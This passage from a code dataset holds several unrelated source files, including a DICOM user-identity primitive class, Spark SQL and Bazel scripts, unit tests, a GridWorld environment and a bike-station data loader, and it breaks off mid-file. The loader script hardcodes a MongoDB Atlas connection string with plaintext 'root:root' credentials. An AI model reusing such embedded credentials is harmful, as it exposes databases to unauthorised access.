def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.UserIdentitySubItemRQ or\n pynetdicom3.pdu.UserIdentitySubItemAC\n\n Raises\n ------\n ValueError\n If server_response is None and user_identity_type or primary_field\n are None\n ValueError\n If server_response is None and user_identity_type is 2 and\n secondary_field is None\n \"\"\"\n # Determine if this primitive is an -RQ or -AC\n if self.server_response is None:\n # Then an -RQ\n if self.user_identity_type is None or self.primary_field is None:\n LOGGER.error(\"User Identity Type and Primary Field must be \"\n \"set prior to Association negotiation\")\n raise ValueError(\"User Identity Type and Primary Field \"\n \"must be set prior to Association negotiation\")\n\n if self.user_identity_type == 2 and self.secondary_field is None:\n LOGGER.error(\"Secondary Field must be set when User Identity\"\n \"is 2\")\n raise ValueError(\"Secondary Field must be set when User \"\n \"Identity is 2\")\n\n item = UserIdentitySubItemRQ()\n\n else:\n # Then an -AC\n item = UserIdentitySubItemAC()\n\n item.FromParams(self)\n\n return item\n\n @property\n def user_identity_type(self):\n \"\"\"Return the User Identity Type.\"\"\"\n return self._user_identity_type\n\n @user_identity_type.setter\n def user_identity_type(self, value):\n \"\"\"Sets the User Identity Type parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n\n Raises\n ------\n 
TypeError\n If `value` is not an int or None\n ValueError\n If `value` is an int and is not 1, 2, 3 or 4\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n if value not in [1, 2, 3, 4]:\n LOGGER.error(\"User Identity Type must be 1, 2 3 or 4 if \"\n \"requesting Association, None otherwise\")\n raise ValueError(\"User Identity Type must be 1, 2 3 or 4 \"\n \"if requesting Association, None otherwise\")\n elif value is None:\n pass\n else:\n LOGGER.error(\"User Identity Type must be an int or None\")\n raise TypeError(\"User Identity Type must be an int or None\")\n\n self._user_identity_type = value\n\n @property\n def positive_response_requested(self):\n \"\"\"Return Positive Response Requested.\"\"\"\n return self._positive_response_requested\n\n @positive_response_requested.setter\n def positive_response_requested(self, value):\n \"\"\"Sets the Positive Response Requested parameter.\n\n Parameters\n ----------\n value : bool\n True if response requested, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n else:\n LOGGER.error(\"Positive Response Requested must be boolean\")\n raise TypeError(\"Positive Response Requested must be boolean\")\n\n self._positive_response_requested = value\n\n @property\n def primary_field(self):\n \"\"\"Return Primary Field.\"\"\"\n return self._primary_field\n\n @primary_field.setter\n def primary_field(self, value):\n \"\"\"Sets the Primary Field parameter.\n\n Parameters\n ----------\n value : bytes or None\n The username or Kerberos Service ticket as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n raise TypeError(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n\n self._primary_field = value\n\n @property\n def secondary_field(self):\n \"\"\"Return the Secondary Field.\"\"\"\n return self._secondary_field\n\n @secondary_field.setter\n def secondary_field(self, value):\n \"\"\"Sets the Secondary Field parameter.\n\n Only used when User Identity Type is equal to 2.\n\n Parameters\n ----------\n value : bytes or None\n The passcode as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n raise TypeError(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n\n self._secondary_field = value\n\n @property\n def server_response(self):\n \"\"\"Return the Server Response.\"\"\"\n return self._server_response\n\n @server_response.setter\n def server_response(self, value):\n \"\"\"Sets the Server Response parameter.\n\n Parameters\n ----------\n value : bytes or None\n The server response as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Server Response 
must be bytes or None\")\n raise TypeError(\"Server Response must be bytes or None\")\n\n self._server_response = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'User Identity Parameters\\n'\n if self.server_response is None:\n s += ' User identity type: {0:d}\\n'.format(\n self.user_identity_type)\n s += ' Positive response requested: {0!r}\\n' \\\n .format(self.positive_response_requested)\n s += ' Primary field: {0!s}\\n'.format(self.primary_field)\n s += ' Secondary field: {0!s}\\n'.format(self.secondary_field)\n else:\n s += ' Server response: {0!s}\\n'.format(self.server_response)\n\n return s\n","repo_name":"zdalih/wolfpacs","sub_path":"pnd3/pynetdicom3/pdu_primitives.py","file_name":"pdu_primitives.py","file_ext":"py","file_size_in_byte":77037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20111499961","text":"from pyspark.sql import SparkSession\nimport sys\nspark = SparkSession.builder.appName(\"Query3_SparkSQL\").getOrCreate()\n\n# The user must give the input format (csv || parquet)\n\n# For example:\n# spark-submit SparkSqlquery3.py csv\n# to read csv file\n\ninput_format = sys.argv[1]\n\nif input_format == 'parquet':\n movie_genres = spark.read.parquet(\"hdfs://master:9000/movies/movie_genres.parquet\")\n movies = spark.read.parquet(\"hdfs://master:9000/movies/movies.parquet\")\n ratings = spark.read.parquet(\"hdfs://master:9000/movies/ratings.parquet\")\nelse:\n movies = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movies.csv\")\n movie_genres = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movie_genres.csv\")\n ratings = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/ratings.csv\")\n\nmovies.registerTempTable(\"movies\")\nratings.registerTempTable(\"ratings\")\nmovie_genres.registerTempTable(\"movie_genres\")\n\nsqlString = \"select a.Genre as Movie_Genre, avg(b.Rating) as Avg_Rating, count(b.ID) as No_of_movies \\\n from \\\n (select distinct _c1 as Genre, _c0 as aID from movie_genres)a \\\n inner join ( \\\n select distinct _c1 as ID, avg(_c2) as Rating from ratings where _c2 is not null group by _c1\\\n )b \\\n on a.aID = b.ID \\\n group by Genre\\\n order by Genre\"\n\nres = spark.sql(sqlString)\nres.show()","repo_name":"FayStatha/atds-project-NTUA-2021","sub_path":"code/PART A/Spark SQL/SparkSqlquery3.py","file_name":"SparkSqlquery3.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38364513697","text":"\"\"\"Build Model assets from source 3d asset files like fbx, obj, gltf, etc.\"\"\"\n\nload(\"//third_party/fplbase:build_defs.bzl\", \"fpl_png_assets\")\n\ndef build_model(\n name,\n srcs,\n textures = [],\n extra_srcs = [],\n strip_prefix = \"\",\n attrib = None,\n ext = \"lullmodel\",\n visibility = [\"//visibility:public\"]):\n \"\"\"Generates a fplmesh binary from source files.\n\n Args:\n name: name for the filegroup contain the set of generated motiveanim files\n srcs: list of 3d asset files\n textures: list of all textures associated with the model\n strip_prefix: optional string, will be stripped from all input file paths\n in output file generation. 
All subdirectories after\n strip_prefix will be retained.\n attrib: a string specifying which vertex attributes should be output.\n ext: A file extension to replace each input file extension with for output.\n visibility: The visibility of the entity target. Defaults to public.\n \"\"\"\n tool = \"//lullaby/tools/model_pipeline\"\n\n outs = []\n textures_name = \"%s_textures\" % name\n if textures:\n fpl_png_assets(\n name = textures_name,\n srcs = textures,\n strip_prefix = strip_prefix,\n webp_quality = 90,\n )\n\n for src in srcs:\n # Replace source file extension with output file extension\n out = \".\".join(src.split(\".\")[:-1]) + \".\" + ext\n if strip_prefix:\n out = out.split(strip_prefix + \"/\")[-1]\n\n cmd = []\n if textures:\n cmd += [\"textures=\\\"\\\";\"]\n cmd += [\"for f in $(locations %s); do\" % (\":\" + textures_name)]\n cmd += [\" textures+=$$f\\\";\\\";\"]\n cmd += [\"done;\"]\n cmd += [\"$(location %s)\" % tool]\n cmd += [\"--input $(location %s)\" % src]\n cmd += [\"--schema schemas/lull/model_pipeline_def.fbs\"]\n if attrib:\n cmd += [\"--attrib %s\" % attrib]\n if ext:\n cmd += [\"--ext %s\" % ext]\n cmd += [\"--outdir $(@D)\"]\n cmd += [\"--output $@\"]\n genrule_srcs = [src]\n if textures:\n cmd += [\"--textures \\\"$$textures\\\";\"]\n genrule_srcs += [\":\" + textures_name]\n if extra_srcs:\n genrule_srcs += extra_srcs\n\n native.genrule(\n name = \"build_%s\" % out,\n srcs = genrule_srcs,\n tools = [\"//:model_schema\"] + [tool],\n outs = [out],\n cmd = \" \".join(cmd),\n )\n outs += [out]\n\n native.filegroup(name = name, srcs = outs, visibility = visibility)\n","repo_name":"google/lullaby","sub_path":"dev/build_model.bzl","file_name":"build_model.bzl","file_ext":"bzl","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"16"} +{"seq_id":"17417091053","text":"import pytest\nfrom pathlib import Path\nimport json\n\nfrom bluepyemodel.access_point import get_access_point\nfrom dictdiffer import diff\n\nTEST_ROOT = Path(__file__).parents[1]\nDATA = TEST_ROOT / \"test_data\"\n\n\n@pytest.fixture\ndef api_config():\n return {\n \"emodel\": \"cADpyr_L5TPC\",\n \"emodel_dir\": DATA,\n \"recipes_path\": DATA / \"config/recipes.json\",\n }\n\n\n@pytest.fixture\ndef db(api_config):\n return get_access_point(\"local\", **api_config)\n\n\ndef test_get_morphologies(db):\n morphology = db.get_morphologies()\n assert morphology[\"name\"] == \"C060114A5\"\n assert Path(morphology[\"path\"]).name == \"C060114A5.asc\"\n\n\ndef test_get_available_morphologies(db):\n names = db.get_available_morphologies()\n assert len(names) == 1\n assert list(names)[0] == \"C060114A5\"\n\n\ndef test_get_recipes(db):\n recipes = db.get_recipes()\n # json.dump(recipes, open(DATA / \"test_recipes.json\", \"w\"))\n expected_recipes = json.load(open(DATA / \"test_recipes.json\", \"r\"))\n assert list(diff(recipes, expected_recipes)) == []\n\n\ndef test_get_model_configuration(db):\n\n configuration = db.get_model_configuration()\n\n expected_parameters = json.load(open(DATA / \"test_parameters.json\", \"r\"))\n expected_mechanisms = json.load(open(DATA / \"test_mechanisms.json\", \"r\"))\n\n for p in configuration.parameters:\n assert p.location in expected_parameters[\"parameters\"]\n for ep in expected_parameters[\"parameters\"][p.location]:\n if ep[\"name\"] == p.name and ep[\"val\"] == p.value:\n break\n else:\n raise Exception(\"missing parameter\")\n\n assert sorted(list(configuration.mechanism_names)) == [\n 
\"CaDynamics_DC0\",\n \"Ca_HVA2\",\n \"Ca_LVAst\",\n \"Ih\",\n \"K_Pst\",\n \"K_Tst\",\n \"NaTg\",\n \"Nap_Et2\",\n \"SK_E2\",\n \"SKv3_1\",\n \"pas\",\n ]\n\n\ndef test_get_final(db):\n final = db.get_final()\n assert \"cADpyr_L5TPC\" in final\n assert \"parameters\" in final[\"cADpyr_L5TPC\"] or \"params\" in final[\"cADpyr_L5TPC\"]\n\n\ndef test_load_pipeline_settings(db):\n assert db.pipeline_settings.path_extract_config == \"tests/test_data/config/config_dict.json\"\n assert db.pipeline_settings.validation_protocols == [\"APWaveform_140\"]\n\n\ndef test_get_model_name_for_final(db):\n db.emodel_metadata.iteration = \"\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = None\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = \"hash\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__hash__42\"\n\n\ndef test_get_ion_currents_concentrations(db):\n expected_ion_currents = {\n \"ica_Ca_HVA2\",\n \"ica_Ca_LVAst\",\n \"ik_K_Pst\",\n \"ik_K_Tst\",\n \"ina_NaTg\",\n \"ina_Nap_Et2\",\n \"ik_SK_E2\",\n \"ik_SKv3_1\",\n \"ihcn_Ih\",\n \"i_pas\",\n }\n expected_ionic_concentrations = {\n \"cai\",\n \"ki\",\n \"nai\",\n }\n ion_currents, ionic_concentrations = db.get_ion_currents_concentrations()\n assert set(ion_currents) == expected_ion_currents\n assert set(ionic_concentrations) == expected_ionic_concentrations\n","repo_name":"BlueBrain/BluePyEModel","sub_path":"tests/unit_tests/test_local_access_point.py","file_name":"test_local_access_point.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"43471419510","text":"#!/usr/bin/env python3\n\nimport datetime\nimport socket\n\n\nHOST = \"localhost\"\nPORT = 49281\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n print(\"bound\")\n s.listen()\n print(f\"listening on {HOST}:{PORT}\")\n while True:\n conn, addr = s.accept()\n with conn:\n print(\"Connected by\", addr)\n buf = b\"\"\n old_rx_time = None\n old_time = 0\n times = []\n while True:\n try:\n data = conn.recv(1024)\n except OSError:\n break\n if not data:\n break\n\n rx_time = datetime.datetime.now()\n if old_rx_time is not None:\n delta = rx_time - old_rx_time\n else:\n delta = None\n old_rx_time = rx_time\n buf += data\n (*frames, buf) = buf.split(b\"\\r\")\n for frame in frames:\n if (\n not frame\n and delta is not None\n and delta > datetime.timedelta(seconds=0.9)\n ):\n times.append(delta.total_seconds())\n print(sum(times) / len(times))\n # conn.send(b\"ACK \" + frame + b\"\\r\")\n print(\"[{} ({})]: {}\".format(rx_time.isoformat(), delta, frame))\n print(\"disconnected\")\n","repo_name":"dtwood/paging-gpio-firmware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37054830706","text":"import requests\nimport json\nfrom pprint import pprint\nfrom pymongo import MongoClient\n\n\ndef get_vlille():\n url = \"https://opendata.lillemetropole.fr/api/records/1.0/search/?dataset=vlille-realtime&q=&rows=300&facet=libelle&facet=nom&facet=commune&facet=etat&facet=type&facet=etatconnexion\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vrennes():\n # url = 
\"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=etat-des-stations-le-velo-star-en-temps-reel&q=&facet=nom&facet=etat&facet=nombreemplacementsactuels&facet=nombreemplacementsdisponibles&facet=nombrevelosdisponibles\"\n url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=stations_vls&q=&rows=3000\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vlyon():\n # url = \"https://download.data.grandlyon.com/ws/rdata/jcd_jcdecaux.jcdvelov/all.json?maxfeatures=100&start=1\"\n url = \"https://public.opendatasoft.com/api/records/1.0/search/?dataset=station-velov-grand-lyon&q=&facet=name&facet=status&rows=500\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vparis():\n url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-disponibilite-en-temps-reel&q=&facet=name&facet=is_renting&rows=300\"\n # url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-emplacement-des-stations&q=\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\nvlilles = get_vlille()\nvrennes = get_vrennes()\nvlyon = get_vlyon()\nvparis = get_vparis()\n\nvlliles_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nbvelosdispo') + elem.get('fields', {}).get('nbplacesdispo'),\n 'source': {\n 'dataset': 'Lille',\n 'id_ext': elem.get('fields', {}).get('libelle')\n },\n 'tpe': elem.get('fields', {}).get('type', '') == 'AVEC TPE',\n 'available': elem.get('fields', {}).get('etat', '') == 'EN SERVICE'\n }\n for elem in vlilles\n]\n\nvrennes_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nb_socles'),\n 'source': {\n 'dataset': 'Rennes',\n 'id_ext': elem.get('fields', {}).get('objectid')\n },\n 'tpe': elem.get('fields', {}).get('tpe', '') == 'oui',\n 'available': elem.get('fields', {}).get('etat', '') == 'Ouverte'\n }\n for elem in vrennes\n]\n\nvlyon_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('bike_stand'),\n 'source': {\n 'dataset': 'Lyon',\n 'id_ext': int(elem.get('fields', {}).get('gid'))\n },\n 'tpe': elem.get('fields', {}).get('banking', '') == 't',\n 'available': elem.get('fields', {}).get('status', '') == 'OPEN'\n }\n for elem in vlyon\n]\n\nvparis_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('capacity'),\n 'source': {\n 'dataset': 'Paris',\n 'id_ext': int(elem.get('fields', {}).get('stationcode'))\n },\n 'tpe': False,\n 'available': elem.get('fields', {}).get('is_renting', '') == 'OUI'\n }\n for elem in vparis\n]\n\npprint(vlliles_to_insert)\npprint(vrennes_to_insert)\npprint(vlyon_to_insert)\npprint(vparis_to_insert)\n\natlas = MongoClient('mongodb+srv://root:root@cluster0.8wh7w.mongodb.net/bicycle?retryWrites=true&w=majority')\n\ndb = atlas.bicycle\ndb.stations.create_index([(\"geometry\", 
\"2dsphere\")])\ndb.stations.insert_many(vlliles_to_insert)\ndb.stations.insert_many(vrennes_to_insert)\ndb.stations.insert_many(vlyon_to_insert)\ndb.stations.insert_many(vparis_to_insert)\n\n# for vlille in vlliles_to_insert:\n#\tdb.stations.insert_one(vlille)\n","repo_name":"JJFrenoi/ISEN-MONGO","sub_path":"programme_1.py","file_name":"programme_1.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23802300910","text":"#!/usr/bin/python2.7\r\n#\r\n# MAIN.PY IS AUTOMATICALLY STARTED ON REBOOT\r\n#\r\n\r\nimport cv2\r\nimport detect_object\r\nimport movement\r\nimport communication\r\nimport detect_aruco2\r\nimport numpy as np\r\nimport imutils\r\nimport time\r\n#from config import *\r\nimport config\r\nimport argparse\r\n\r\n#COLOR VALUES ARE MOVED TO CONFIG.PY, or more precisely into color_values.pkl,\r\n#which is written by hsv_range_detector.py\r\n\r\ncamera = cv2.VideoCapture(0)\r\n#camera.set(13, 0.40) #hue\r\n#camera.set(14, 0.04) #exposure\r\n\r\ncommunication.send_soon(\"init\")\r\n\r\n\r\nthrower_speed = 0\r\nlast_throw = time.time()\r\n\r\nblinds = cv2.imread('horseblinds.png', 0)\r\n\r\n\r\n'''Command line:\r\n Command line parameters are not saved anywhere, so use always when needed.\r\n Defaults are AA, off, blue.\r\n'''\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--id', help='Field and robot: AA, AB, AC, BA...')\r\nparser.add_argument('--brakes', help='Emergency brake is on or not: on/off')\r\nparser.add_argument('--target', help='Where to throw: magenta or blue')\r\nparser.add_argument('--tambov', help='linear adjustment of throwing distance')\r\nargs=parser.parse_args()\r\n\r\nif not args.id is None:\r\n config.FIELD_ID = args.id[0]\r\n config.ROBOT_ID = args.id[1]\r\nif not args.brakes is None:\r\n config.BRAKES_ON = True if args.brakes=='on' else False\r\nif not args.target is None:\r\n config.TARGET_BASKET=args.target\r\n config.BASKET = config.MAGENTA_BASKET if args.target == 'magenta' else config.BLUE_BASKET\r\n\r\nif not args.tambov is None:\r\n detect_aruco2.TAMBOV = int(args.tambov)\r\nprint (detect_aruco2.TAMBOV)\r\n\r\n#print('PARAMS: FIELD=', FIELD_ID, ', ROBOT=', ROBOT_ID, ', BRAKES=', BRAKES_ON, ', TARGET=', TARGET_BASKET)\r\n#input()\r\n\r\nframestart = 0\r\ntry:\r\n while 1:\r\n\r\n (grabbed, frame) = camera.read()\r\n #print(\"grabbed = \",grabbed)\r\n frame = cv2.bitwise_and(frame, frame, mask = blinds)\r\n # resize the frame, blur it, and convert it to the HSV\r\n #frame = imutils.resize(frame, width=600)\r\n # blurred = cv2.GaussianBlur(frame, (11, 11), 0)\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n ball_x1, ball_y1, ball_radius1, ball_center1, ball_mask = detect_object.find_ball(hsv, config.BALL_LOWER, config.BALL_UPPER)\r\n if ball_x1 >= 0:\r\n cv2.circle(frame, ball_center1, 10, (0, 0, 255), -1)\r\n cv2.imshow(\"mask\", ball_mask)\r\n\r\n basket_dist, basket_x, basket_corners, basket_ids = detect_aruco2.detect_basket(frame)\r\n basket_dist = detect_aruco2.gimme_running_average(basket_dist)\r\n\r\n amount_of_carpet = detect_object.percentage_of_color(hsv, config.CARPET_LOWER, config.CARPET_UPPER)\r\n\r\n\r\n communication.update_comms()\r\n print(\"ball_y = \", ball_y1)\r\n m1,m2,m3,thrower_speed = movement.get_command(ball_x1, ball_y1,ball_radius1, basket_x, basket_dist, amount_of_carpet)\r\n print(\"sent by the main: \",m1,m2,m3)\r\n\r\n communication.set_motors(m1,m2,m3)\r\n now = time.time()\r\n 
communication.update_comms()\r\n if thrower_speed > 0:\r\n communication.set_thrower(thrower_speed)\r\n last_throw = now\r\n elif (now - last_throw) >= 3:\r\n communication.set_thrower(0)\r\n communication.update_comms()\r\n\r\n\r\n\r\n cv2.putText(frame, \"CARPET: {}\".format(int(amount_of_carpet)),\r\n (50, 80), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n fps = round(1.0 / (time.time() - framestart))\r\n cv2.putText(frame, \"FPS: {}\".format( fps ),\r\n (50, 100), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, \"dx: {}, dy: {}, radius: {}\".format(int(ball_x1), int(ball_y1), int(ball_radius1)),\r\n (50, 50), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.35, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, str( movement.activeState ),\r\n (10, 420), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.45, (0, 0, 255), 1)\r\n\r\n cv2.line(frame, (320,100), (320,200), (0,0,255),1)\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n framestart = time.time()\r\n\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n break\r\n elif key == ord('b'):\r\n config.BRAKES_ON = not config.BRAKES_ON\r\n if config.BRAKES_ON:\r\n communication.send_now('sm:0:0:0')\r\n print (\"BRAKES!\")\r\n elif key == ord('p'): # take a screenshot\r\n cv2.imwrite('screenshot.png', frame)\r\n\r\n elif key == ord('w') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:0:20')\r\n elif key == ord('s') and config.BRAKES_ON:\r\n communication.send_now('sm:20:0:-20')\r\n elif key == ord('a') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:-20:-20')\r\n elif key == ord('d') and config.BRAKES_ON:\r\n communication.send_now('sm:20:20:20')\r\n\r\n elif key == 0xFF and config.BRAKES_ON:\r\n communication.send_soon('sm:0:0:0')\r\n\r\nexcept KeyboardInterrupt:\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kadiraktass/robotex","sub_path":"software/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23374857220","text":"import numpy as np\n\nclass GridWorld:\n def __init__(self, grid_size=5, wind=0.2):\n # (0,0) bottom left corner (x,y)\n self.names = [\"Right\", \"Down\", \"Left\", \"Up\"]\n self.actions = [(1,0),(0,1),(-1,0),(0,-1)]\n self.n_actions = len(self.actions)\n self.n_states = grid_size**2\n self.wind = float(wind)\n \n self.grid_size = grid_size\n self.grid = np.zeros((grid_size, grid_size))\n\n self.features = np.eye(self.n_states)\n self.dynamics = self.transition_probabilities()\n self.real_rewards = np.array([self.reward(s) for s in range(self.n_states)])\n self.state = 0\n\n\n def reward(self, state_p):\n return 1 if state_p == self.n_states-1 else 0\n \n\n def reset(self, random=False):\n if random:\n self.state = np.random.randint(self.n_states)\n else:\n self.state = 0\n return self.state\n\n\n def step(self, a):\n probs = self.dynamics[:, a, self.state]\n self.state = np.random.choice(self.n_states, p=probs)\n return self.state\n\n\n def transition_probabilities(self):\n dynamics = np.zeros((self.n_states, self.n_actions, self.n_states))\n # S_t+1, A_t, S_t\n for s in range(self.n_states):\n x, y = s%self.grid_size, s//self.grid_size\n for a in range(self.n_actions):\n x_a, y_a = self.actions[a]\n for d in range(self.n_actions):\n x_d, y_d = self.actions[d]\n if 0 <= x+x_d < 
self.grid_size and 0 <= y+y_d < self.grid_size:\n dynamics[(x+x_d) + (y+y_d)*self.grid_size, a, s] += self.wind/self.n_actions\n else:\n dynamics[s, a, s] += self.wind/self.n_actions\n if 0 <= x+x_a < self.grid_size and 0 <= y+y_a < self.grid_size:\n dynamics[(x+x_a) + (y+y_a)*self.grid_size, a, s] += 1 - self.wind\n else:\n dynamics[s, a, s] += 1 - self.wind\n \n return dynamics\n\n \n def test(self):\n for s in range(self.n_states):\n print(\"/// State: \", s)\n for a in range(self.n_actions):\n print(\"/// Action: \", self.names[a])\n probs = self.dynamics[:, a, s]\n print(probs.reshape(-1, self.grid_size))\n\n\n def optimal_policy(self, state):\n x, y = state%self.grid_size, state//self.grid_size\n if x > y:\n return 1\n elif x < y:\n return 0\n else:\n return np.random.randint(2)\n\n\n def generate_trajectories(self, num, length, policy=None):\n if not policy:\n policy = self.optimal_policy\n\n trajs = []\n for n in range(num):\n t = []\n state = self.reset()\n for i in range(length):\n action = policy(state)\n state_p = self.step(action)\n t.append([state, action])\n state = state_p\n trajs.append(t)\n return np.array(trajs)","repo_name":"TroddenSpade/Maximum-Entropy-Deep-IRL","sub_path":"envs/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"20083184923","text":"# \n# cronned processes\n#\nimport time\nimport multiprocessing\nfrom threading import Thread, Event\nimport logging\nfrom file import DirectoryScanner, DiskScanner\n\ndef initCron(appContext):\n\tappContext.threads = []\n\n\tdirectoryScanner = DirectoryScanner(appContext )\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=directoryScanner.process ) )\n\n\tdiskScanner = DiskScanner(appContext)\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=diskScanner.process ) )\n\ndef startCron(appContext):\n\tfor thr in appContext.threads:\n\t\tthr.start()\n\nclass RepeatingTimer(Thread):\n\tdef __init__(self, delay=15, maxIterations=0, target=None):\n\t\tThread.__init__(self)\n\t\tself.daemon = True\n\t\tself.delay = delay\n\t\tself.target = target\n\t\tself.maxIterations = maxIterations\n\t\tself.finished = Event()\n\n\tdef run(self):\n\t\tcurrentIteration = 0\n\t\twhile not self.finished.isSet() and (self.maxIterations <= 0 or currentIteration < self.maxIterations):\n\t\t\tself.finished.wait( self.delay)\n\t\t\tif not self.finished.isSet():\n\t\t\t\tself.target()\n\t\t\t\tcurrentIteration += 1\n\n\tdef cancel(self):\n\t\tself.finished.set()\n","repo_name":"ickyfehmleh/hoarder","sub_path":"app/cron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71018146249","text":"import pickle\nimport re\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport faiss\nimport numpy as np\nimport spacy\nimport wikipedia\nfrom loguru import logger\nfrom pydantic import BaseModel\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\nfrom discworld_hex.book import Book, BookText\nfrom discworld_hex.sections import SECTIONS\n\nmodel = SentenceTransformer()\n\n\nclass Library(BaseModel):\n name: str\n books: List[Book] = []\n\n sentence_splitter_model: spacy.Language = None\n encoder_model: SentenceTransformer = None\n\n sentence_index: faiss.IndexFlatL2 = None\n sentence_index_to_book_text: Dict[int, 
